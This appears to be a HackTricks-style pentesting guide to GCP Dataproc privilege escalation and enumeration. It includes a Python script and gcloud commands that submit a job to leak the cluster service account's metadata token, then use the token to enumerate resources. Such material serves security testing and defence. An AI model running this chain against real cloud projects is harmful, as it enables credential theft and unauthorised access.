# GCP Dataproc Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataproc

Google Cloud Dataproc roles like `roles/dataproc.editor` and `roles/dataproc.admin` grant significant permissions over Dataproc resources. If these roles are assigned to a compromised user or service account, they can be abused to escalate privileges by leaking sensitive metadata tokens or by accessing other GCP resources.

{{#ref}}
../gcp-services/gcp-dataproc-enum.md
{{#endref}}

## Key Permissions in Dataproc Roles

- `roles/dataproc.editor`: modify Dataproc jobs; submit PySpark, Spark, Hadoop, and other job types to a cluster; access job logs and configurations; and interact with associated GCP services like Cloud Storage and BigQuery.
- `roles/dataproc.admin`: full control over Dataproc clusters, including creating, deleting, and managing them.

These permissions make both roles highly sensitive and dangerous if misused.

### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`

The `projects.regions.jobs.submit` method enables a SA to create a Dataproc job, which can be abused as shown in the example below. Note that in order to exploit these permissions the SA must also have the privileges required to move the malicious script to the storage bucket (`storage.objects.create`).

The following permissions were assigned to the SA for the PoC: `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`, `storage.objects.list`.
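Before submitting anything, it is worth confirming that the compromised credentials really hold this permission set. A minimal sketch using the `testIamPermissions` REST method (the project ID is a placeholder, not a value from the original PoC):

```bash
# Ask GCP which of the required permissions the current credentials actually hold;
# the response only echoes back the permissions that are granted.
TOKEN=$(gcloud auth print-access-token)
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  "https://cloudresourcemanager.googleapis.com/v1/projects/<project-id>:testIamPermissions" \
  -d '{"permissions": ["dataproc.clusters.get", "dataproc.clusters.use", "dataproc.jobs.create", "dataproc.jobs.get", "storage.objects.create", "storage.objects.get"]}'
```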
## Privilege Escalation via Metadata Token Leaking

I was unable to get a reverse shell using this method; however, it is possible to leak the SA token from the metadata endpoint as described below.

#### Steps to exploit

- Place the job script in a GCP Storage bucket.
- Submit the job to a Dataproc cluster.
- Leak the service account token used by the cluster.
### Example Script for token leaking

The following script demonstrates how an attacker can submit a job to a Dataproc cluster to leak the metadata token:

```python
import requests

# Metadata server URL to fetch the access token
metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
headers = {"Metadata-Flavor": "Google"}

def fetch_metadata_token():
    # Query the metadata server from inside the Dataproc job and print the returned token
    response = requests.get(metadata_url, headers=headers)
    print(response.json())

if __name__ == "__main__":
    fetch_metadata_token()
```
### Steps to exploit

```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>

# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
    --cluster=<cluster-name> \
    --region=<region>
```
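Note that `gcloud dataproc jobs submit` streams the job's driver output (and therefore the printed token) back to the terminal. A minimal sketch for re-attaching to a pending or running job's output, assuming the SA also holds `dataproc.jobs.get`:

```bash
# Re-attach to the driver output of a pending/running job; the leaked token is printed there
gcloud dataproc jobs wait <job-id> --region=<region>
```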
### Use the Leaked Token

The leaked token can be used to:

- Access GCP APIs and resources (depending on the token's permissions), as shown in the example below.
- Enumerate resources such as Cloud Storage buckets, BigQuery datasets, and more.
- Potentially escalate privileges further if the token has high-level permissions (e.g., `roles/owner`).
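As an illustration of the first two points, the token can be used directly against the REST APIs; a minimal sketch (project ID and token are placeholders):

```bash
TOKEN="<leaked-access-token>"

# Inspect the token: which identity and scopes does it carry?
curl -s "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=$TOKEN"

# Example enumeration: list Cloud Storage buckets in the project with the leaked token
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://storage.googleapis.com/storage/v1/b?project=<project-id>"
```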
{{#include ../../../banners/hacktricks-training.md}}

# GCP - Dataproc Enum

{{#include ../../../banners/hacktricks-training.md}}
## Basic Information

```bash
# List jobs and inspect a specific one
gcloud dataproc jobs list --region=<region>
gcloud dataproc jobs describe <job-id> --region=<region>
```
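Job driver output is a common place to find sensitive data (tokens printed by jobs, connection strings, etc.). Assuming read access to the cluster's staging bucket, a sketch for pulling it:

```bash
# Locate where a job's driver output is stored
gcloud dataproc jobs describe <job-id> --region=<region> \
  --format="value(driverOutputResourceUri)"

# The URI points into the staging bucket; dump the output files
gsutil cat "<driver-output-resource-uri>*"
```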

### Privesc

Enumerating Dataproc clusters can expose sensitive data, such as tokens, configuration scripts, or job output logs, which can be leveraged for further exploitation. Misconfigured roles or excessive permissions granted to the service account can allow:

- Access to sensitive APIs (e.g., BigQuery, Cloud Storage).
- Token exfiltration via the metadata server (see the service account check sketched below).
- Data exfiltration from misconfigured buckets or job logs.

{{#ref}}
../gcp-privilege-escalation/gcp-dataproc-privesc.md
{{#endref}}
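To judge how valuable a cluster's metadata token would be, check which service account its VMs run as. A quick sketch, assuming the field `config.gceClusterConfig.serviceAccount` is set (if it is empty, the default Compute Engine service account is used):

```bash
# Which service account do the cluster VMs (and therefore their metadata endpoint) use?
gcloud dataproc clusters describe <cluster-name> --region=<region> \
  --format="value(config.gceClusterConfig.serviceAccount)"
```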
{{#include ../../../banners/hacktricks-training.md}}